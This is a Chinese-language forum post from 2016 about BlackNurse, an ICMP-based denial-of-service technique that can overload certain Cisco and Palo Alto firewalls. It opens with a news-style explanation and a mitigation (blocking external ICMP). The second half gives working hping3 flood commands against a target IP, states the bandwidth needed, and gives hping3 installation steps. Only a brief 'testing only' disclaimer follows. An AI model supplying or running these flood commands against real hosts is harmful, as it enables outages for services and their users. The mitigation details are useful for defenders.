|
|
以往黑客在针对网络服务器发动攻击时常常会动用大量的“肉鸡”来同时向服务器发送请求,从而导致服务器信息拥堵崩溃。但来自TDC安全运营中心的技术人员发现一种全新的攻击方式,黑客只需要一台笔记本就能够让大型网络服务器宕机。这种新的攻击技术名为BlackNurse,它的精髓不是利用大量的信息流来轰炸服务器,而是通过发送特殊形式的Internet控制消息协议数据包来让服务器防火墙自己产生大量的冗余信息,最终把自己“噎死”。目前,BlackNurse已经被验证对采用Cisco、Palo Alto Networks方案部署的服务器防火墙能够奏效。不过,TDC技术人员表示,目前已经有可以防止BlackNurse攻击的方法。用户需要设置防火墙过滤规则,阻止外部ICMP数据包进入。对此,Cisco、Palo Alto Networks都表示自己的防火墙都默认屏蔽外部ICMP数据包,但也不排除部分用户基于特殊需要而开放这一规则。在允许外部ICMP数据包进入的情况下,任何一台计算机都可能触发BlackNurse攻击。
根据记载
你需要 15-18 Mbit/s. 带宽
用 Hping3 下面任意一个命令
hping3 -1 -C 3 -K 3 -i u20 <target ip>
hping3 -1 -C 3 -K 3 --flood <target ip>
会产生大约 180 Mbit/s DoS attack
///////////////////////////////////////////////////////////////////
Install HPing
1: Install EPEL Repository
shell> sudo yum install epel-release
2: Install HPing3
shell> sudo yum install hping3
////////////////////////////////////////////////////////////////////
请仅仅用于网站测试
参考网址 http://blacknurse.dk/ |
|
发表于 2016-11-14 16:50:34
